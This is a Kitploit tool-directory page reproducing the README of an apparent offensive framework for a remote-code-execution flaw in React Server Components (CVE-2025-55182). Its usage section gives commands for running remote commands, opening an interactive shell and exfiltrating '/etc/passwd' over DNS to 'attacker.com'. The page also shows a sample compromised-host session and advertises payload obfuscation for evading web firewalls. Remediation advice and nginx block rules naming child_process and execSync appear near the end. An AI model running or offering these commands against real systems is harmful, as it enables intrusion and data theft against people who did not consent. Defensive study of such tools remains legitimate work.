Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit — Advanced React Server Components RCE scanner for CVE-2025-55182. Features: multi-stage fingerprinting, vulnerability verification, DNS exfiltration, interactive shell, payload obfuscation, and professional reporting (JSON/HTML/PDF). Authorized testing only. | Kitploit
Strumenti/GitHubGitHub/cerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationData ExfiltrationWAF BypassPenetration TestingRemote Access ToolPayload Development

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHubcerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit

CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

Advanced React Server Components RCE scanner for CVE-2025-55182. Features: multi-stage fingerprinting, vulnerability verification, DNS exfiltration, interactive shell, payload obfuscation, and professional reporting (JSON/HTML/PDF). Authorized testing only.

Vedi Repository
122 giorni faNon ancora revisionato
Condividi
Contenuto non disponibile nella lingua richiesta. Visualizzazione della versione inglese.

🔐 ReactRCE-Scanner

CVE-2025-55182 — Advanced React Server Components RCE Exploit & Assessment Framework

Version CVE CVSS Python License

Author PRs Welcome Downloads


📑 Table of Contents

  • Legal Disclaimer & Ethical Notice

  • Overview

  • Key Capabilities

  • Quick Start Guide

  • Architecture & Feature Deep Dive

  • Configuration Reference

  • Automated Test Suite

  • Remediation & Mitigation

  • Contributing & Community

  • References

  • License & Author


⚠️ Legal Disclaimer & Ethical Notice

**This tool is engineered exclusively for EDUCATIONAL and AUTHORIZED SECURITY TESTING purposes.**Unauthorized utilization of this software against targets without prior written consent constitutes a violation of international computer crime laws, including the Computer Fraud and Abuse Act (CFAA), GDPR mandates, and standard terms of service agreements. The author and contributors disclaim all liability for any misuse, illegal operations, or consequential damages resulting from this program.Proceed strictly at your own risk.


📋 Overview

ReactRCE-Scanner is an enterprise-grade security assessment and verification framework designed specifically for CVE-2025-55182 [1], a critical Remote Code Execution (RCE) vulnerability affecting React Server Components across versions 19.0.0 through 19.2.0.

The framework bridges the gap between theoretical vulnerability research and practical security validation. By incorporating multi-stage fingerprinting, rigorous false-positive reduction, advanced payload obfuscation, and automated multi-format reporting, it provides security engineers with precise diagnostic capabilities.

UsageScan Results

🎯 Key Capabilities

Feature CategoryImplementation HighlightOperational Status
Smart FingerprintingMulti-source framework and version detection with confidence scoring algorithms.✅
Multi-Stage Verification5-stage validation pipeline designed to systematically eliminate false positives.✅
Payload GenerationObfuscated payload builder supporting DNS exfiltration and multi-encoding.✅
Interactive ShellReal-time pseudo-interactive command execution and shell access on verified targets.✅
Comprehensive ReportingAutomated report generation in JSON, HTML, PDF, and Markdown formats.✅
DNS ExfiltrationOut-of-band command output exfiltration via secure DNS query handling.✅
Concurrency EngineHigh-performance multi-threaded scanning architecture for large attack surfaces.✅
Proxy IntegrationHTTP/HTTPS and SOCKS proxy support for anonymized assessment traffic.✅

🚀 Quick Start Guide

Installation

Clone the repository and initialize the environment utilizing the automated setup script or manual dependency installation:

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh

# Alternatively, install core Python dependencies manually
pip install -r requirements.txt

Basic Command Reference

The framework operates via a modular CLI architecture supporting single-target validation, bulk scanning from file lists, interactive shell spawning, and compliance reporting.

root@kitploit:~
# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan

# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json

# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"

# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell

# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com

# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf

🔬 Architecture & Feature Deep Dive

1. Smart Fingerprinting Engine

The framework performs deep reconnaissance prior to payload delivery. It analyzes multiple HTTP header fields (X-Powered-By, Next-Action, RSC ), HTML structural meta tags (data-reactroot, __NEXT_DATA__), static build assets, and JavaScript source bundles [2] [3].

Confidence scores are categorized into four tiers:

  • CRITICAL (95%+): Multiple orthogonal indicators confirm vulnerable React Server Component runtime versions.

  • HIGH (75–95%): Strong structural indicators identified with exact version matching.

  • MEDIUM (50–75%): Partial framework markers present; manual verification required.

  • LOW (<50%): Weak heuristics detected; high probability of false positive.

2. Multi-Stage Verification Workflow

To maintain operational integrity and prevent unintended service disruptions, payloads pass through a strict validation pipeline before any exploitation phase is unlocked.

root@kitploit:~
Target URL / Endpoint
       │
       ▼
[Stage 1] Framework & Header Detection
       │
       ▼
[Stage 2] Component Version Analysis
       │
       ▼
[Stage 3] Protocol Compatibility Check
       │
       ▼
[Stage 4] Non-Destructive Safe Validation Request
       │
       ▼
[Stage 5] Statistical Confidence Scoring
       │
       ▼
Vulnerability Assessment Decision

3. Payload Obfuscation & Evasion

To test defensive controls and Web Application Firewalls (WAFs), the framework embeds an advanced payload generator supporting:

  • Encoding Schemes: Base64, Hexadecimal, and Octal transformations.

  • Structural Obfuscation: Dynamic string splitting, junk code injection, and alternative require method mapping.

  • Out-of-Band (OOB) Exfiltration: Secure data tunneling across DNS queries when direct response channels are restricted.

4. Interactive Command Shell

Upon successful session establishment, operators can invoke an interactive shell environment for post-verification enumeration.

root@kitploit:~
$ python exploit.py -t https://target.com -m shell
[*] Initializing interactive shell session against https://target.com
[!] Type 'exit' to terminate the session.

shell> whoami
www-data

shell> uname -a
Linux ip-10-0-1-15 6.8.0-1018-aws #20-Ubuntu SMP PREMO__X64 x86_64 GNU/Linux

shell> exit
[*] Terminating session and cleaning up temporary artifacts...

5. Professional Reporting Suite

Reports can be generated across multiple standardized formats (JSON, HTML, PDF, Markdown ) containing executive summaries, risk metrics, detailed technical findings, evidence timelines, and CVSS v3.1 scoring breakdowns [4].


⚙️ Configuration Reference

Advanced parameters are managed through the config.yaml configuration file. Below is a production configuration template:

root@kitploit:~
# ReactRCE-Scanner Production Configuration

timeout: 30
threads: 20
max_retries: 3
proxy: null

user_agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"

headers:
  Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
  Accept-Language: "en-US,en;q=0.5"
  Accept-Encoding: "gzip, deflate, br"

output:
  format: "json"
  directory: "./reports"

logging:
  level: "INFO"
  file: "exploit.log"

exploit:
  obfuscate: true
  encoding: "base64"
  timeout: 60

scanning:
  concurrent_scans: 20
  rate_limit: 0.5
  timeout: 30

fingerprint:
  enable_deep_analysis: true
  follow_redirects: true
  analyze_assets: true

Execute scans referencing the custom configuration file via:

root@kitploit:~
python exploit.py -f targets.txt -C config.yaml -o report.json

🧪 Automated Test Suite

The repository includes a comprehensive unit and integration test suite to ensure module stability across releases.

root@kitploit:~
# Execute the complete automated test suite
python exploit.py --test

# Expected Output:
Running test suite...
✓ test_fingerprinting passed
✓ test_payload_generation passed
✓ test_config_loading passed
✓ test_verification passed
✓ test_report_generation passed

Tests passed: 5/5

For contributors setting up a local development environment:

root@kitploit:~
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit
pip install -r requirements-dev.txt

# Run pytest unit tests
pytest tests/

# Format and lint codebase
black exploit.py
flake8 exploit.py

🛡️ Remediation & Mitigation

Immediate Administrative Actions

  1. Patching: Upgrade React packages immediately to version 19.2.1 or higher. Update Next.js instances to version 15.0.4+ [5].

  2. Monitoring: Inspect HTTP access logs for suspicious Next-Action header values and unvalidated prototype references (__proto__, constructor ) [6].

  3. Network Hardening: Restrict outbound recursive DNS queries from application servers to prevent data exfiltration.

Reference WAF Rules (Nginx / OpenResty)

root@kitploit:~
# Block prototype pollution and remote execution attempts in request bodies
if ($request_body ~* "__proto__") {
    return 403;
}
if ($request_body ~* "constructor") {
    return 403;
}
if ($request_body ~* "child_process") {
    return 403;
}
if ($request_body ~* "execSync") {
    return 403;
}

📚 References

  1. National Vulnerability Database — CVE-2025-55182 Advisory

  2. React Security Documentation & Advisories

  3. Next.js Security Bulletins

  4. FIRST CVSS v3.1 Specification & Calculator

  5. OWASP Guide to Prototype Pollution Vulnerabilities

  6. Node.js Child Process Security Best Practices


🤝 Contributing & Community

Contributions, feature requests, and bug reports are welcome. Please adhere to the standard fork-and-pull request workflow:

  1. Fork the repository (https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit/fork )

  2. Create your feature branch (git checkout -b feature/AdvancedScannerModule)

  3. Commit your changes (git commit -m 'Add advanced scanning heuristic')

  4. Push to the branch (git origin push feature/AdvancedScannerModule)

  5. Open a Pull Request


📜 License & Author

Distributed under the MIT License. See LICENSE for more information.

Created with precision by CerberusMrXi Last Updated: August 2026

Scarica lo strumento